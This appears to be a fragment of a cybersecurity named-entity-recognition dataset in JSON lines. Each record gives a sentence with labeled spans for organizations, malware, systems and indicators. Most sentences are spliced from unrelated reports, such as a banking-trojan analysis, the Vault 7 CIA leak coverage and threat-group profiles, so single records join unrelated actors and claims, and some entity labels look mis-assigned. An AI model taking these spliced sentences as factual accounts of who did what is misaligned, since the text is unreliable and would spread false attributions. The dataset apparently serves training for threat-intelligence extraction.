APT3 : Gothic Panda , Pirpi , UPS Team , Buckeye , Threat Group-0110 , TG-0110 .", "spans": [{"start": 47, "end": 53, "label": "Indicator"}, {"start": 121, "end": 130, "label": "Organization"}, {"start": 213, "end": 216, "label": "System"}, {"start": 455, "end": 459, "label": "Organization"}, {"start": 462, "end": 474, "label": "Organization"}, {"start": 477, "end": 482, "label": "Organization"}, {"start": 485, "end": 493, "label": "Organization"}, {"start": 496, "end": 503, "label": "Organization"}, {"start": 506, "end": 523, "label": "Organization"}, {"start": 526, "end": 533, "label": "Organization"}]} {"text": "Figure 6 : bit.ly statistics for the fake Bank Austria Android app download link From this small sample , we see that 7 % of visitors clicked through to download the application , which is actually a version of the Marcher banking Trojan named \u201c BankAustria.apk \u201d , continuing the fraudulent use of the bank \u2019 s branding to fool potential victims . The threat actors were able to maintain long term persistent access to many of these networks by utilizing compromised credentials . APT3 is a China based threat group that researchers have attributed to China's Ministry of StateSecurity .", "spans": [{"start": 11, "end": 17, "label": "Indicator"}, {"start": 42, "end": 66, "label": "System"}, {"start": 215, "end": 237, "label": "Malware"}, {"start": 246, "end": 261, "label": "Indicator"}, {"start": 353, "end": 366, "label": "Organization"}, {"start": 482, "end": 486, "label": "Organization"}, {"start": 553, "end": 586, "label": "Organization"}]} {"text": "This sample is similar to those presented in other recent Marcher analyses [ 1 ] [ 2 ] . Cisco Talos will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve to ensure that our customers remain protected and the public is informed . 
This group is responsible for the campaigns known as Operation Clandestine Fox , Operation Clandestine Wolf , and Operation Double Tap .", "spans": [{"start": 58, "end": 65, "label": "Malware"}, {"start": 89, "end": 100, "label": "Organization"}]} {"text": "This particular application is signed with a fake certificate : Owner : CN=Unknown , OU=Unknown , O=Unknown , L=Unknown , ST=Unknown , C=Unknown Issuer CN=Unknown , OU=Unknown , O=Unknown , L=Unknown , ST=Unknown , C=Unknown Serial : 1c9157d7 Validity : 11/02/2017 00:16:46 03/20/2045 00:16:46 MD5 Hash : A8:55:46:32:15 If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . As of June 2015 , the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong .", "spans": [{"start": 305, "end": 319, "label": "Indicator"}, {"start": 358, "end": 367, "label": "System"}, {"start": 370, "end": 372, "label": "Malware"}, {"start": 383, "end": 409, "label": "Malware"}]} {"text": ": A9 : D5:95 : A9:91 : C2:91:77:5D:30 : F6 SHA1 Hash : 32:17 : E9:7E:06 : FE:5D:84 : BE:7C:14:0C : C6:2B:12:85 : E7:03:9A:5F The app requests extensive permissions during installation that enable a range of activities supported by the malware . Create a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart . MITRE has also developed an APT3 Adversary Emulation Plan .", "spans": [{"start": 55, "end": 124, "label": "Indicator"}, {"start": 254, "end": 263, "label": "Malware"}, {"start": 290, "end": 307, "label": "Malware"}, {"start": 371, "end": 376, "label": "Organization"}, {"start": 399, "end": 403, "label": "Organization"}]} {"text": "Those permission shown in bold below are the most problematic : Allows an application to write to external storage . 
More importantly , one of these files also enables the download of TeamViewer , a remote access tool that gives threat actors remote control over the system . APT30 is a threat group suspected to be associated with the Chinese government .", "spans": [{"start": 184, "end": 194, "label": "System"}, {"start": 229, "end": 242, "label": "Organization"}, {"start": 276, "end": 281, "label": "Organization"}, {"start": 336, "end": 354, "label": "Organization"}]} {"text": "Allows an application to read from external storage . Such attacks highlight the need for caution before downloading files from unknown sources and enabling macro for files from unknown sources . While Naikon shares some characteristics with APT30 , the two groups do not appear to be exact matches .", "spans": [{"start": 59, "end": 66, "label": "Malware"}, {"start": 202, "end": 208, "label": "Organization"}, {"start": 242, "end": 247, "label": "Organization"}]} {"text": "Allows an application to use SIP service . The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities . APT32 : SeaLotus , OceanLotus , APT-C-00 .", "spans": [{"start": 56, "end": 72, "label": "Organization"}, {"start": 148, "end": 151, "label": "Organization"}, {"start": 236, "end": 241, "label": "Organization"}, {"start": 244, "end": 252, "label": "Organization"}, {"start": 255, "end": 265, "label": "Organization"}, {"start": 268, "end": 276, "label": "Organization"}]} {"text": "Allows an application to collect battery statistics Allows an app to access precise location . By the end of 2016 , the CIA's hacking division , which formally falls under the agency's Center for Cyber Intelligence (CCI) , had over 5000 registered users and had produced more than a thousand hacking systems , trojans , viruses , and other weaponized malware . 
APT32 is a threat group that has been active since at least 2014 .", "spans": [{"start": 120, "end": 142, "label": "Organization"}, {"start": 292, "end": 307, "label": "System"}, {"start": 310, "end": 317, "label": "System"}, {"start": 320, "end": 327, "label": "System"}, {"start": 340, "end": 358, "label": "System"}, {"start": 361, "end": 366, "label": "Organization"}]} {"text": "Allows an application to receive SMS messages . Such is the scale of the CIA's undertaking that by 2016 , its hackers had utilized more code than that used to run Facebook . The group has targeted multiple private sector industries as well as with foreign governments , dissidents , and journalists with a strong focus on Southeast Asian countries like Vietnam , the Philippines , Laos , and Cambodia .", "spans": [{"start": 110, "end": 117, "label": "Organization"}]} {"text": "Allows an application to send SMS messages . Wikileaks has carefully reviewed the Year Zero disclosure and published substantive CIA documentation while avoiding the distribution of 'armed' cyberweapons until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should analyzed , disarmed and published . They have extensively used strategic web compromises to compromise victims .", "spans": [{"start": 45, "end": 54, "label": "Organization"}, {"start": 129, "end": 132, "label": "Organization"}, {"start": 381, "end": 406, "label": "System"}]} {"text": "Allows an application to read SMS messages . These redactions include ten of thousands of CIA targets and attack machines throughout Latin America , Europe and the United States . The group is believed to be Vietnam based .", "spans": [{"start": 90, "end": 93, "label": "Organization"}]} {"text": "Allows an application to write SMS messages . 
The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell's 1984 , but Weeping Angel , developed by the CIA's Embedded Devices Branch (EDB) , which infests smart TVs , transforming them into covert microphones , is surely its most emblematic realization . FIN7 : Carbanak Group .", "spans": [{"start": 157, "end": 170, "label": "System"}, {"start": 190, "end": 195, "label": "Organization"}, {"start": 242, "end": 251, "label": "System"}, {"start": 254, "end": 266, "label": "Malware"}, {"start": 342, "end": 346, "label": "Organization"}, {"start": 349, "end": 363, "label": "Organization"}]} {"text": "Allows an application to initiate a phone call without going through the Dialer user interface for the user to confirm the call . After infestation , Weeping Angel places the target TV in a 'Fake-Off' mode , so that the owner falsely believes the TV is off when it is on . FIN7 is a financially-motivated threat group that has primarily targeted the U.S. retail , restaurant , and hospitality sectors since mid-2015 .", "spans": [{"start": 150, "end": 163, "label": "Organization"}, {"start": 273, "end": 277, "label": "Organization"}]} {"text": "Allows applications to access information about networks . As of October 2014 the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks . They often use point-of-sale malware .", "spans": [{"start": 82, "end": 85, "label": "Organization"}, {"start": 192, "end": 205, "label": "System"}]} {"text": "Allows applications to open network sockets . The CIA's Mobile Devices Branch (MDB) developed numerous attacks to remotely hack and control popular smart phones . 
A portion of FIN7 was run out of a front company called Combi Security .", "spans": [{"start": 50, "end": 55, "label": "Organization"}, {"start": 176, "end": 180, "label": "Organization"}, {"start": 219, "end": 233, "label": "Organization"}]} {"text": "Allows an application to read the user 's contacts data . Despite iPhone's minority share (14.5%) of the global smart phone market in 2016 , a specialized unit in the CIA's Mobile Development Branch produces malware to infest , control and exfiltrate data from iPhones and other Apple products running iOS , such as iPads . FIN7 is sometimes referred to as Carbanak Group , but these appear to be two groups using the same Carbanak malware and are therefore tracked separately .", "spans": [{"start": 167, "end": 172, "label": "Organization"}, {"start": 261, "end": 268, "label": "System"}, {"start": 279, "end": 284, "label": "System"}, {"start": 302, "end": 305, "label": "System"}, {"start": 316, "end": 321, "label": "System"}, {"start": 324, "end": 328, "label": "Organization"}, {"start": 357, "end": 371, "label": "Organization"}, {"start": 423, "end": 431, "label": "Malware"}]} {"text": "Allows an application to read or write the system settings . The attack against Samsung smart TVs was developed in cooperation with the United Kingdom's MI5/BTSS . FIN8 is a financially motivated threat group known to launch tailored spearphishing campaigns targeting the retail , restaurant , and hospitality industries .", "spans": [{"start": 80, "end": 97, "label": "Organization"}, {"start": 153, "end": 161, "label": "Organization"}, {"start": 164, "end": 168, "label": "Organization"}]} {"text": "Allows an application to force the device to lock Allows applications to access information about Wi-Fi networks . CIA's arsenal includes numerous local and remote zero days developed by CIA or obtained from GCHQ , NSA , FBI or purchased from cyber arms contractors such as Baitshop . 
Gallmaker is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017 .", "spans": [{"start": 115, "end": 120, "label": "Organization"}, {"start": 208, "end": 212, "label": "System"}, {"start": 215, "end": 218, "label": "System"}, {"start": 243, "end": 265, "label": "System"}, {"start": 285, "end": 294, "label": "Organization"}]} {"text": "Allows applications to change Wi-Fi connectivity state . These techniques permit the CIA to bypass the encryption of WhatsApp , Signal , Telegram , Wiebo , Confide and Cloackman by hacking the smart phones that they run on and collecting audio and message traffic before encryption is applied . The group has mainly targeted victims in the defense , military , and government sectors .", "spans": [{"start": 85, "end": 88, "label": "Organization"}]} {"text": "Allows applications to change network connectivity state . The CIA also runs a very substantial effort to infect and control Microsoft Windows users with its malware . DarkHydrus is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016 .", "spans": [{"start": 63, "end": 66, "label": "Organization"}, {"start": 168, "end": 178, "label": "Organization"}]} {"text": "Analysis of the malware shows that it uses the common string obfuscation of character replacement ( Figure 7 ) : Figure 7 : Encoded Marcher Strings Figure 8 : Decoded Marcher Strings As noted , the application requests extensive permissions during installation ; Figure 9 shows the request to act as device administrator , a particular permission that should very rarely be granted to an app . 
CIA's malware includes multiple local and remote weaponized zero days , air gap jumping viruses such as Hammer Drill which infects software distributed on CD/DVDs , infectors for removable media such as USBs , systems to hide data in images or in covert disk areas Brutal Kangaroo and to keep its malware infestations going . The group heavily leverages open-source tools and custom payloads for carrying out attacks .", "spans": [{"start": 132, "end": 139, "label": "Malware"}, {"start": 167, "end": 174, "label": "Malware"}, {"start": 394, "end": 399, "label": "Organization"}, {"start": 498, "end": 510, "label": "System"}, {"start": 659, "end": 674, "label": "System"}]} {"text": "Figure 9 : Prompt for application permissions upon installation Figures 10 and 11 show the other permission screens for the app : Figure 10 Figure 10 : Part 1 of the permission screen for the app Figure 11 : Part 2 of the permission screen for the app Once installed the app will place a legitimate looking icon on the phone \u2019 s home screen , again using branding stolen from the bank . Many of these infection efforts are pulled together by the CIA's Automated Implant Branch (AIB) , which has developed several attack systems for automated infestation and control of CIA malware , such as Assassin and Medusa . 
Deep Panda : Shell Crew , WebMasters , KungFu Kittens , PinkPanther , Black Vine .", "spans": [{"start": 446, "end": 451, "label": "Organization"}, {"start": 591, "end": 599, "label": "System"}, {"start": 604, "end": 610, "label": "System"}, {"start": 613, "end": 623, "label": "Organization"}, {"start": 626, "end": 636, "label": "Organization"}, {"start": 639, "end": 649, "label": "Organization"}, {"start": 652, "end": 666, "label": "Organization"}, {"start": 669, "end": 680, "label": "Organization"}, {"start": 683, "end": 693, "label": "Organization"}]} {"text": "Figure 12 : Fake Bank Austria Security application icon In addition to operating as a banking Trojan , overlaying a legitimate banking app with an indistinguishable credential theft page , the malware also asks for credit card information from the user when they open applications such as the Google Play store . The CIA has developed automated multi-platform malware attack and control systems covering Windows , Mac OS X , Solaris , Linux and more , such as EDB's HIVE and the related Cutthroat and Swindle tools , which are described in the examples section below . Deep Panda is a suspected Chinese threat group known to target many industries , including government , defense , financial , and telecommunications .", "spans": [{"start": 12, "end": 50, "label": "System"}, {"start": 293, "end": 304, "label": "System"}, {"start": 317, "end": 320, "label": "Organization"}, {"start": 404, "end": 411, "label": "System"}, {"start": 414, "end": 422, "label": "System"}, {"start": 425, "end": 432, "label": "System"}, {"start": 435, "end": 440, "label": "System"}, {"start": 466, "end": 470, "label": "System"}, {"start": 487, "end": 496, "label": "System"}, {"start": 501, "end": 508, "label": "System"}, {"start": 569, "end": 579, "label": "Organization"}]} {"text": "Figure 13 : Popup asking for a credit card number The application also supports stealing credit card verification information ( Figures 14 and 15 ) . 
By hiding these security flaws from manufacturers like Apple and Google the CIA ensures that it can hack everyone \u2014 at the expense of leaving everyone hackable . The intrusion into healthcare company Anthem has been attributed to Deep Panda .", "spans": [{"start": 205, "end": 210, "label": "Organization"}, {"start": 215, "end": 221, "label": "Organization"}, {"start": 226, "end": 229, "label": "Organization"}, {"start": 350, "end": 356, "label": "Organization"}, {"start": 377, "end": 390, "label": "Organization"}]} {"text": "Figure 14 : Information theft via fake credit card verification using stolen branding Figure 15 : Information theft via fake credit card verification using stolen branding Some of the campaigns appear to have a wider reach based on bit.ly statistics like this one from October 13 , 2017 : Figure 16 : bit.ly statistics for an October 13 , 2017 campaign Over several days during the last three months , Proofpoint researchers observed campaigns using similar techniques targeting the banking customers of Raiffeisen and Sparkasse . Once in Frankfurt CIA hackers can travel without further border checks to the 25 European countries that are part of the Schengen open border area \u2014 including France , Italy and Switzerland . This group is also known as Shell Crew , WebMasters , KungFu Kittens , and PinkPanther .", "spans": [{"start": 232, "end": 238, "label": "Indicator"}, {"start": 301, "end": 307, "label": "Indicator"}, {"start": 402, "end": 412, "label": "Organization"}, {"start": 549, "end": 552, "label": "Organization"}, {"start": 751, "end": 761, "label": "Organization"}, {"start": 764, "end": 774, "label": "Organization"}, {"start": 777, "end": 791, "label": "Organization"}, {"start": 798, "end": 809, "label": "Organization"}]} {"text": "A review of the bit.ly statistics for these campaigns shows that they were at least as effective in driving end-user clicks as the Bank Austria campaign analyzed above . 
A number of the CIA's electronic attack methods are designed for physical proximity . Deep Panda also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion .", "spans": [{"start": 16, "end": 22, "label": "Indicator"}, {"start": 131, "end": 143, "label": "System"}, {"start": 186, "end": 191, "label": "Organization"}, {"start": 256, "end": 266, "label": "Organization"}, {"start": 295, "end": 305, "label": "Organization"}, {"start": 358, "end": 364, "label": "Organization"}]} {"text": "Conclusion As our computing increasingly crosses multiple screens , we should expect to see threats extending across mobile and desktop environments . The attacker is provided with a USB containing malware developed for the CIA for this purpose , which is inserted into the targeted computer . Some analysts track Deep Panda and APT19 as the same group , but it is unclear from open source information if the groups are the same .", "spans": [{"start": 155, "end": 163, "label": "Organization"}, {"start": 183, "end": 205, "label": "System"}, {"start": 308, "end": 324, "label": "Organization"}, {"start": 329, "end": 334, "label": "Organization"}]} {"text": "Moreover , as we use mobile devices to access the web and phishing templates extend to mobile environments , we should expect to see a greater variety of integrated threats like the scheme we detail here . The attacker then infects and exfiltrates data to removable media . Dragonfly : Energetic Bear .", "spans": [{"start": 210, "end": 218, "label": "Organization"}, {"start": 266, "end": 271, "label": "Organization"}, {"start": 274, "end": 283, "label": "Organization"}, {"start": 286, "end": 300, "label": "Organization"}]} {"text": "As on the desktop , mobile users need to be wary of installing applications from outside of legitimate app stores and sources and be on the lookout for bogus banking sites that ask for more information than users would normally provide on legitimate sites . 
As an example , specific CIA malware revealed in Year Zero is able to penetrate , infest and control both the Android phone and iPhone software that runs or has run presidential Twitter accounts . Dragonfly is a cyber espionage group that has been active since at least 2011 .", "spans": [{"start": 283, "end": 286, "label": "Organization"}, {"start": 287, "end": 294, "label": "System"}, {"start": 455, "end": 464, "label": "Organization"}]} {"text": "Unusual domains , the use of URL shorteners , and solicitations that do not come from verifiable sources are also red flags for potential phishing and malware . For example , the CIA attack system Fine Dining provides 24 decoy applications for CIA spies to use . They initially targeted defense and aviation companies but shifted to focus on the energy sector in early 2013 .", "spans": []} {"text": "Ginp - A malware patchwork borrowing from Anubis November 2019 Intro ThreatFabric analysts have recently investigated an interesting new strain of banking malware . For example , Comodo was defeated by CIA malware placing itself in the Windows Recycle Bin . They have also targeted companies related to industrial control systems .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 42, "end": 48, "label": "Malware"}, {"start": 69, "end": 81, "label": "System"}, {"start": 179, "end": 185, "label": "Organization"}, {"start": 202, "end": 205, "label": "Organization"}]} {"text": "The malware was first spotted by Tatyana Shishkova from Kaspersky by end October 2019 , but actually dates back to June 2019 . CIA hackers discussed what the NSA's Equation Group hackers did wrong and how the CIA's malware makers could avoid similar exposure . 
A similar group emerged in 2015 and was identified by Symantec as Dragonfly 2.0 .", "spans": [{"start": 56, "end": 65, "label": "Organization"}, {"start": 127, "end": 130, "label": "Organization"}, {"start": 164, "end": 178, "label": "Organization"}, {"start": 315, "end": 323, "label": "Organization"}, {"start": 327, "end": 340, "label": "Organization"}]} {"text": "It is still under active development , with at least 5 different versions of the Trojan released within the last 5 months ( June - November 2019 ) . The CIA's Remote Devices Branch's UMBRAGE group collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation . There is debate over the extent of the overlap between Dragonfly and Dragonfly 2.0 , but there is sufficient evidence to lead to these being tracked as two separate groups .", "spans": [{"start": 153, "end": 158, "label": "Organization"}, {"start": 183, "end": 190, "label": "Organization"}, {"start": 400, "end": 409, "label": "Organization"}, {"start": 414, "end": 427, "label": "Organization"}]} {"text": "What makes Ginp stand out is that it was built from scratch being expanded through regular updates , the last of which including code copied from the infamous Anubis banking Trojan , indicating that its author is cherry-picking the most relevant functionality for its malware . This information is used by the CIA's 'JQJIMPROVISE' software (see below) to configure a set of CIA malware suited to the specific needs of an operation . 
Dragonfly 2.0 : Berserk Bear .", "spans": [{"start": 11, "end": 15, "label": "Malware"}, {"start": 159, "end": 165, "label": "Malware"}, {"start": 310, "end": 315, "label": "Organization"}, {"start": 316, "end": 330, "label": "System"}, {"start": 433, "end": 446, "label": "Organization"}, {"start": 449, "end": 461, "label": "Organization"}]} {"text": "In addition , its original target list is extremely narrow and seems to be focused on Spanish banks . Its configuration utilities like Margarita allow the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionnaires . Dragonfly 2.0 is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least March 2016 .", "spans": [{"start": 135, "end": 144, "label": "Malware"}, {"start": 214, "end": 226, "label": "Malware"}, {"start": 263, "end": 276, "label": "Organization"}, {"start": 324, "end": 343, "label": "Organization"}, {"start": 362, "end": 393, "label": "Organization"}]} {"text": "Last but not least , all the overlay screens ( injects ) for the banks include two steps ; first stealing the victim \u2019 s login credentials , then their credit card details . HIVE is a multi-platform CIA malware suite and its associated control software . There is debate over the extent of overlap between Dragonfly 2.0 and Dragonfly , but there is sufficient evidence to lead to these being tracked as two separate groups .", "spans": [{"start": 174, "end": 178, "label": "System"}, {"start": 199, "end": 202, "label": "Organization"}, {"start": 306, "end": 319, "label": "Organization"}, {"start": 324, "end": 333, "label": "Organization"}]} {"text": "Although multi-step overlays are not something new , their usage is generally limited to avoid raising suspicion . 
A series of standards lay out CIA malware infestation patterns which are likely to assist forensic crime scene investigators as well as Apple , Microsoft , Google , Samsung , Nokia , Blackberry , Siemens and anti-virus companies attribute and defend against attacks . DragonOK is a threat group that has targeted Japanese organizations with phishing emails .", "spans": [{"start": 145, "end": 148, "label": "Organization"}, {"start": 251, "end": 256, "label": "Organization"}, {"start": 259, "end": 268, "label": "Organization"}, {"start": 271, "end": 277, "label": "Organization"}, {"start": 280, "end": 287, "label": "Organization"}, {"start": 290, "end": 295, "label": "Organization"}, {"start": 298, "end": 308, "label": "Organization"}, {"start": 311, "end": 318, "label": "Organization"}, {"start": 323, "end": 343, "label": "Organization"}, {"start": 383, "end": 391, "label": "Organization"}, {"start": 437, "end": 450, "label": "Organization"}]} {"text": "Evolution The initial version of the malware dates back to early June 2019 , masquerading as a \u201c Google Play Verificator \u201d app . In April 2013 , Kaspersky Lab reported that a popular game was altered to include a backdoor in 2011 . Due to overlapping TTPs , including similar custom tools , DragonOK is thought to have a direct or indirect relationship with the threat group Moafee .", "spans": [{"start": 97, "end": 120, "label": "System"}, {"start": 145, "end": 154, "label": "Organization"}, {"start": 291, "end": 299, "label": "Organization"}, {"start": 369, "end": 381, "label": "Organization"}]} {"text": "At that time , Ginp was a simple SMS stealer whose purpose was only to send a copy of incoming and outgoing SMS messages to the C2 server . Yet again , new supply-chain attacks recently caught the attention of ESET Researchers . 
It is known to use a variety of malware , including Sysget / HelloBridge , PlugX , PoisonIvy , FormerFirstRat , NFlog , and NewCT .", "spans": [{"start": 15, "end": 19, "label": "Malware"}, {"start": 210, "end": 214, "label": "Organization"}, {"start": 281, "end": 287, "label": "Malware"}, {"start": 290, "end": 301, "label": "Malware"}, {"start": 304, "end": 309, "label": "Malware"}, {"start": 312, "end": 321, "label": "Malware"}, {"start": 324, "end": 338, "label": "Malware"}, {"start": 341, "end": 346, "label": "Malware"}, {"start": 353, "end": 358, "label": "Malware"}]} {"text": "A couple of months later , in August 2019 , a new version was released with additional banking-specific features . Given that these attacks were mostly targeted against Asia and the gaming industry , it shouldn\u2019t be surprising they are the work of the group described in Kaspersky\u2019s Winnti \u2013 More than just a game\u201d . Dust Storm is a threat group that has targeted multiple industries in Japan , South Korea , the United States , Europe , and several Southeast Asian countries .", "spans": [{"start": 182, "end": 197, "label": "Organization"}, {"start": 271, "end": 282, "label": "Organization"}, {"start": 283, "end": 289, "label": "Organization"}, {"start": 317, "end": 327, "label": "Organization"}]} {"text": "This and following versions were masquerading as fake \u201c Adobe Flash Player \u201d apps . The OSB functions as the interface between CIA operational staff and the relevant technical support staff . CopyKittens is an Iranian cyber espionage group that has been operating since at least 2013 .", "spans": [{"start": 56, "end": 74, "label": "System"}, {"start": 88, "end": 91, "label": "System"}, {"start": 127, "end": 130, "label": "Organization"}, {"start": 192, "end": 203, "label": "Organization"}]} {"text": "The malware was able to perform overlay attacks and become the default SMS app through the abuse of the Accessibility Service . 
A sustained cyberespionage campaign targeting at least three companies in the United States and Europe was uncovered by Recorded Future and Rapid7 between November 2017 and September 2018 . It has targeted countries including Israel , Saudi Arabia , Turkey , the U.S. , Jordan , and Germany .", "spans": [{"start": 248, "end": 263, "label": "Organization"}, {"start": 268, "end": 274, "label": "Organization"}]} {"text": "The overlay consisted of a generic credit card grabber targeting social and utility apps , such as Google Play , Facebook , WhatsApp , Chrome , Skype , Instagram and Twitter . The Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . Tick Group Continues Attacks .", "spans": [{"start": 99, "end": 110, "label": "System"}, {"start": 113, "end": 121, "label": "System"}, {"start": 124, "end": 132, "label": "System"}, {"start": 135, "end": 141, "label": "System"}, {"start": 144, "end": 149, "label": "System"}, {"start": 152, "end": 161, "label": "System"}, {"start": 166, "end": 173, "label": "System"}, {"start": 180, "end": 189, "label": "Malware"}, {"start": 349, "end": 353, "label": "Malware"}, {"start": 409, "end": 413, "label": "Organization"}]} {"text": "Although early versions had some basic code and string obfuscation , protection of the third version of the malware was enhanced with the use of payload obfuscation . The attackers then enumerated access and conducted privilege escalation on the victim networks , utilizing DLL sideloading techniques documented in a US-CERT alert on APT10 to deliver malware . 
The \" Tick \" group has conducted cyber espionage attacks against organizations in the Republic of Korea and Japan for several years .", "spans": [{"start": 334, "end": 339, "label": "Organization"}, {"start": 367, "end": 371, "label": "Organization"}]} {"text": "The capabilities remained unchanged , but a new endpoint was added to the Trojan C2 allowing it to handle the generic card grabber overlay and specific target overlays ( banking apps ) separately . On the two other victim networks , the attackers deployed a unique version of the UPPERCUT (ANEL) backdoor , known to have only been used by APT10 . The group focuses on companies that have intellectual property or sensitive information like those in the Defense and High-Tech industries .", "spans": [{"start": 280, "end": 288, "label": "System"}, {"start": 339, "end": 344, "label": "Organization"}, {"start": 453, "end": 474, "label": "Organization"}]} {"text": "In addition , the credit card grabber target list was expanded with Snapchat and Viber . APT10 actors then compressed proprietary data from Visma using WinRAR (deployed by the attackers) and exfiltrated to a Dropbox account using the cURL for Windows command-line tool . 
The group is known to use custom malware called Daserf , but also employs multiple commodity and custom tools , exploit vulnerabilities , and use social engineering techniques .", "spans": [{"start": 68, "end": 76, "label": "System"}, {"start": 81, "end": 86, "label": "System"}, {"start": 89, "end": 94, "label": "Organization"}, {"start": 152, "end": 158, "label": "System"}, {"start": 234, "end": 238, "label": "System"}, {"start": 319, "end": 325, "label": "Malware"}, {"start": 345, "end": 363, "label": "System"}, {"start": 368, "end": 380, "label": "System"}, {"start": 391, "end": 406, "label": "Vulnerability"}, {"start": 417, "end": 446, "label": "System"}]} {"text": "In the third version spotted in the wild , the author introduced parts of the source code of the infamous Anubis Trojan ( which was leaked earlier in 2019 ) . UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . With multiple tools and anonymous infrastructure , they are running longstanding and persistent attack campaigns .", "spans": [{"start": 106, "end": 112, "label": "Malware"}, {"start": 159, "end": 166, "label": "Malware"}, {"start": 178, "end": 194, "label": "Malware"}, {"start": 197, "end": 216, "label": "Malware"}, {"start": 219, "end": 233, "label": "Malware"}, {"start": 236, "end": 252, "label": "Malware"}, {"start": 255, "end": 266, "label": "Malware"}, {"start": 269, "end": 289, "label": "Malware"}, {"start": 292, "end": 299, "label": "Malware"}, {"start": 333, "end": 339, "label": "Malware"}, {"start": 358, "end": 372, "label": "System"}, {"start": 377, "end": 401, "label": "System"}]} {"text": "This change came hand in hand with a new overlay target list , no longer targeting social apps , but focusing on banking instead . 
We assess with high confidence that these incidents were conducted by APT10 ( also known as Stone Panda , menuPass , CVNX ) in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage . We have observed that the adversary has repeatedly attacked a high-profile target in Japan using multiple malware families for the last three years .", "spans": [{"start": 201, "end": 206, "label": "Organization"}, {"start": 223, "end": 234, "label": "Organization"}, {"start": 237, "end": 245, "label": "Organization"}, {"start": 248, "end": 252, "label": "Organization"}, {"start": 473, "end": 489, "label": "Malware"}]} {"text": "A remarkable fact is that all the targeted apps relate to Spanish banks , including targets never seen before in any other Android banking Trojan . On top of the breadth , volume , and targets of attacks that APT10 has conducted since at least 2016 , we now know that these operations are being run by the Chinese intelligence agency , the Ministry of State Security (MSS) . Symantec was first to publicly report on Tick , followed by LAC in 2016 .", "spans": [{"start": 123, "end": 130, "label": "System"}, {"start": 209, "end": 214, "label": "Organization"}, {"start": 375, "end": 383, "label": "Organization"}, {"start": 416, "end": 420, "label": "Organization"}, {"start": 435, "end": 438, "label": "Organization"}]} {"text": "The 24 target apps belong to 7 different Spanish banks : Caixa bank , Bankinter , Bankia , BBVA , EVO Banco , Kutxabank and Santander . Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd , the MSS has conducted an unprecedented campaign , dubbed Operation Cloud Hopper , \u201d against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients . 
These reports discussed the group \u2019s malware , Daserf ( a.k.a Muirim or Nioupale ) and some additional downloader programs .", "spans": [{"start": 57, "end": 67, "label": "System"}, {"start": 70, "end": 79, "label": "System"}, {"start": 82, "end": 88, "label": "System"}, {"start": 91, "end": 95, "label": "System"}, {"start": 98, "end": 107, "label": "System"}, {"start": 110, "end": 119, "label": "System"}, {"start": 124, "end": 133, "label": "System"}, {"start": 252, "end": 255, "label": "Organization"}, {"start": 516, "end": 522, "label": "Malware"}, {"start": 531, "end": 537, "label": "Malware"}, {"start": 541, "end": 549, "label": "Malware"}]} {"text": "The specific apps can be found in the target list in the appendix . We assess that APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks , and not of stealing Visma intellectual property . Though Daserf wasn\u2019t a popular attack tool at the time of publishing the two reports , it dates back to at least 2011 .", "spans": [{"start": 83, "end": 88, "label": "Organization"}, {"start": 255, "end": 261, "label": "Malware"}]} {"text": "The most recent version of Ginp ( at the time of writing ) was detected at the end of November 2019 . In this same time frame , APT10 also targeted a U.S. law firm and an international apparel company , likely to gather information for commercial advantage . 
Using AutoFocus , we were able to identify the link among Daserf and two other threats , 9002 and Invader .", "spans": [{"start": 27, "end": 31, "label": "Malware"}, {"start": 128, "end": 133, "label": "Organization"}, {"start": 150, "end": 163, "label": "Organization"}, {"start": 185, "end": 200, "label": "Organization"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 317, "end": 323, "label": "Malware"}, {"start": 348, "end": 352, "label": "Malware"}, {"start": 357, "end": 364, "label": "Malware"}]} {"text": "This version has some small modifications which seems to be unused , as the malware behaviour is the same as the previous version . The backdoor was deployed using the Notepad++ updater and sideloading malicious DLL , as noted in APT10\u2019s targeting of Japanese corporations in July 2018 . These threats shared infrastructure between July 2012 and April 2013 .", "spans": [{"start": 230, "end": 237, "label": "Organization"}, {"start": 251, "end": 272, "label": "Organization"}]} {"text": "The author has introduced the capability to grant the app the device admin permission . That attack was attributed to perpetrators Kaspersky called the Winnti Group . Invader ( a.k.a Kickesgo ) is a backdoor that injects its main code into a legitimate process , such as explorer.exe , and has following functions :", "spans": [{"start": 131, "end": 140, "label": "Organization"}, {"start": 152, "end": 164, "label": "Organization"}, {"start": 167, "end": 174, "label": "Malware"}, {"start": 183, "end": 191, "label": "Malware"}, {"start": 271, "end": 283, "label": "Indicator"}]} {"text": "Additionally new endpoint was added that seems related to downloading a module for the malware , probably with new features or configuration . APT10 is a threat actor that has been active since at least 2009 . 
